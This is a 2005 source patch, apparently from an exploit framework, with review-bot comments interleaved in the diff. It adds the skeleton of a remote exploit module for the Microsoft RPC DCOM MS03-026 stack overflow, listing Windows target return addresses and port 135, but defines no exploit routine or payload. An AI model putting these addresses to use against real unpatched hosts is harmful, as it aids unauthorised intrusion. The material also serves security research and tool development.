From 04a9cbd7ad9bd16709daf9ff062f7215dc6f8888 Mon Sep 17 00:00:00 2001
From: Matt Miller
Date: Sun, 5 Jun 2005 04:37:48 +0000
Subject: [PATCH] moved

git-svn-id: file:///home/svn/incoming/trunk@2575 4d416f70-5f16-0410-b530-b9f4589650da
---
 lib/msf/core/exploit.rb | 1 +
 lib/rex/socket/ssl_tcp.rb | 1 +
 .../exploits/windows/msrpc_dcom_ms03_026.rb | 51 +++++++++++++++++++
 3 files changed, 53 insertions(+)
 create mode 100644 modules/exploits/windows/msrpc_dcom_ms03_026.rb

diff --git a/lib/msf/core/exploit.rb b/lib/msf/core/exploit.rb
index 89a163b4a8..22409fe683 100644
--- a/lib/msf/core/exploit.rb
+++ b/lib/msf/core/exploit.rb
@@ -223,6 +223,7 @@ end
 #
 ###
 class RemoteExploit < Exploit
+
 def exploit_type
 Exploit::Type::Remote
 end
diff --git a/lib/rex/socket/ssl_tcp.rb b/lib/rex/socket/ssl_tcp.rb
index 14e7539c36..fb0b7f1e63 100644
--- a/lib/rex/socket/ssl_tcp.rb
+++ b/lib/rex/socket/ssl_tcp.rb
@@ -69,6 +69,7 @@ class Rex::Socket::SslTcp < Rex::Socket::Tcp
 def close
 sslsock.close
+ sock.close
 end
 def has_read_data?(timeout = nil)
diff --git a/modules/exploits/windows/msrpc_dcom_ms03_026.rb b/modules/exploits/windows/msrpc_dcom_ms03_026.rb
new file mode 100644
index 0000000000..f6602ea9b6
--- /dev/null
+++ b/modules/exploits/windows/msrpc_dcom_ms03_026.rb
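Review bot: The added `sock.close` in `Rex::Socket::SslTcp#close` only runs when `sslsock.close` returns normally; if the SSL shutdown raises (a peer that has already reset the connection is the usual case) the plain socket is never closed, which is exactly the descriptor leak this line is meant to fix. Conversely, if `sslsock` was built with `sync_close` enabled it already closes the underlying socket itself, and on the Ruby of this era I believe a second `close` on a closed stream raises IOError; how `sslsock` is constructed is outside this hunk, so that case is worth checking. Running the second close from an `ensure` and guarding it with `closed?` covers both situations without changing the normal path.
```ruby
	def close
		begin
			sslsock.close
		ensure
			# Always release the underlying descriptor, even if the SSL shutdown failed.
			sock.close unless sock.closed?
		end
	end
```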
@@ -0,0 +1,51 @@
+require 'Msf/Core'
+
+module Msf
+module Exploits
+module Remote
+
+class MSRPC_DCOM_MS03_026 < Msf::RemoteExploit
+
+ def initialize
+ super(
+ 'Name' => 'Microsoft RPC DCOM MSO3-026',
+ 'Description' =>
+ "This module exploits a stack overflow in the RPCSS service, this vulnerability" + "was originally found by the Last Stage of Delirium research group and has been" + "widely exploited ever since. This module can exploit the English versions of " + "Windows NT 4.0 SP3-6a, Windows 2000, Windows XP, and Windows 2003 all in one request :)",
+ 'Author' => [ 'hdm', 'spoonm' ],
+ 'Version' => '$Revision$',
+ 'Refs' =>
+ [
+ [ 'OSVDB', '2100' ],
+ [ 'MSB', 'MS03-026' ],
+ ],
+ 'Targets' =>
+ [
+ # Target 0: Universal
+ [
+ 'Windows NT SP3-6a/2000/XP/2003 Universal',
+ [ 'winnt', 'win2000', 'winxp', 'win2003' ],
+ 0x74ff16f3, # Windows NT 4.0 SP3/4 (pop pop ret) rnr20.dll
+ 0x776a240d, # Windows NT 4.0 SP5 (eax) ws2help.dll
+ 0x77f33723, # Windows NT 4.0 SP6a (esp)
+ 0x7ffde0eb, # Windows 2000 writable address + jmp+0xe0
+ 0x0018759f, # Windows 2000 Universal (ebx)
+ 0x01001c59, # Windows XP | XP SP0/SP1 (pop/pop/ret)
+ 0x001b0b0b, # Windows 2003 call near [ebp+0x30] (unicode.nls)
+ ]
+ ],
+ 'DefaultTarget' => 0,
+ 'Options' =>
+ [
+ Opt::RHOST,
+ Opt::RPORT(135)
+ ])
+ end
+
+end
+
+end
+end
+end
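Review bot: As the hunk reads, the 'Description' value concatenates four string literals with no separating whitespace, so the text shown to users comes out as `...this vulnerabilitywas originally found...` and `...has beenwidely exploited...`; give the first two literals a trailing space, e.g. `"This module exploits a stack overflow in the RPCSS service, this vulnerability " +` and `"...research group and has been " +`. The 'Name' also spells the bulletin with a letter O, `'Microsoft RPC DCOM MSO3-026'`, while the 'Refs' entry correctly reads `MS03-026`; change it to `'Name' => 'Microsoft RPC DCOM MS03-026',`. Separately, `require 'Msf/Core'` uses a capitalised path while the framework files touched by this same patch live under lowercase `lib/msf/core/`; unless a `Msf/Core` loader exists elsewhere on the load path, that require will not resolve on a case-sensitive filesystem, so it is worth confirming. Note that the class as committed defines only `initialize` (metadata and per-target return addresses) and no `exploit` method, presumably still to come.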